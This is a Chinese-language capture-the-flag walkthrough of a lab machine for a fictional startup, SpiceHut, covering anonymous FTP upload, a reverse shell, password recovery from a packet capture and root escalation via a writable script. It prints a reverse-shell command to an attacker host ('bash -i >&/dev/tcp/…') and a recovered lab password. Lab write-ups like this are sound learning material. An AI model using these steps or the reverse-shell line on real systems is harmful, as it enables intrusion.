本文详细记录了一次针对初创公司SpiceHut的渗透测试过程,从信息收集开始,通过匿名FTP登录,利用TFP服务写入命令执行脚本,反弹Shell,再到用户权限获取,最后成功获取Root权限。过程中涉及了端口扫描、文件权限利用、Wireshark流量分析及密码破解等技巧。
Startup
我们是Spice Hut,一家刚刚起步的新兴创业公司!我们提供多种香料和俱乐部三明治(以防您饿了),但这不是您在这里的原因。说实话,我们不确定我们的开发人员是否知道他们在做什么,并且我们的安全性担忧正在上升。我们要求您进行彻底的渗透测试,并尝试拥root权限。祝好运!
0x01 信息收集
Nmap扫一波端口一般先扫所有端口,再针对开放端口进行综合扫描
这里ftp有个anonymous匿名登录
感觉这个图片可能有利用
看了一下图片,再用steghide提取内容好像没有利用的地方
看了下notice.txt内容也没有提示:有个类似Maya的“用户名”
0x02 漏洞利用
先用dirb扫一下目录得到files目录
访问是ftp的目录,看结构是tfp服务
ftp里的tfp文件加是777权限,可以put文件上去
写了一个命令执行的脚本上传上去。
执行命令成功。反弹shell没弹回来,这边用了个反弹shell的脚本直接弹
0x03 反弹Shell
NC起监听,put用ftp权限777的目录内,然后进行访问就弹回shell
用python生产交互式的tty
用python传了个提权枚举脚本过去也没有收获。只能翻翻看。
看看家目录,没有权限
根目录下有incidents
incidents目录下有个suspicious.pcapng,用wireshark打开来看看
用python再incidents搭个网站吧文件传出来
利用wireshark导出txt文档搜索
搜索passw有个登录失败的密码
追踪TCP流得到一个密码c4ntg3t3n0ughsp1c3
0x04 User权限
用密码尝试了lennie登录,成功。
lennie下面script目录下有个planner.sh 所属root具有可执行权限,会执行/etc/print.sh。
追踪/etc/print.sh所属lennie
在/etc/print.sh中加入反弹shell的脚本。
bash -i >&/dev/tcp/10.10.0.68/9999 0>&1
0x05 ROOT权限
用nc另起监听等待反弹Shell,成功获得flag
647
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
